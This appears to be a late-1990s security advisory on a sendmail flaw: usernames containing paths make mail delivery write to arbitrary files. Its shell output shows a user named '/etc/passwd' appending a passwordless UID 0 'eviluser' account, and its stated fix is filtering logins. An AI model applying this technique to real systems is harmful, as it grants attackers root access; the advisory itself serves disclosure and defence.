COMMAND

    sendmail

SYSTEMS AFFECTED

    Most systems running thing above in in the way described below

PROBLEM

    Duck  Vader  posted  following.   It  seems  sendmail will readily
    write to a path in the  username as long as it doesn't  begin with
    a forward slash. A few quick examples:

        thePond:~# cat /etc/passwd | grep ../
        ../../a:*:519:100:tmp:/home/tmp:/bin/tcsh
        thePond:~# ls -l /var/a
        -rw-------   1 ../../a  users           0 Nov 23 12:14 /var/a

        thePond:/var/spool# ls -ld atjobs
        drwxr-xr-x   2 root     root         1024 Nov 23 11:55 atjobs
        thePond:/var/spool# cat /etc/passwd | grep atjobs
        ../atjobs:*:520:100:tmp:/tmp:/bin/tcsh
        thePond:/var/spool# ls -l
        total 16
        drwxr-xr-x   2 root     root         1024 Nov 23 11:55 BOGUS.EYF
        -rw-------   1 ../atjob users           0 Nov 23 12:20 atjobs

    Yes, you can precede the pathname with a forward slash.

        thePond:~# cat /etc/passwd | grep passwd
        /etc/passwd:*:515:100:tmp:/home/tmp:
        thePond:~# cat /etc/passwd
        root:*:0:0:root:/root:/bin/tcsh
        bin:*:1:1:bin:/bin:
        daemon:*:2:2:daemon:/sbin:
        [Edited out more passwords..]
        >From root Tue Nov 25 20:44:00 1997
        To: /etc/passwd

        eviluser::0:0:Sendmail quirks:/root:/bin/tcsh

    This probably will not be a problem for the average user. However,
    BBSes and free  email services often  let the user  select his own
    username, and will add him  to /etc/passwd for email and  whatnot.
    If someone ran into  a site that did  this, he could just  specify
    his login as  /etc/passwd and write  himself a new  username, this
    time with UID:GID 0:0.

SOLUTION

    Filtering logins will do it.   Anonymous remailers and free  email
    services should check their /etc/passwd and pay attention for such
    hacks if they can't filter somehow login input.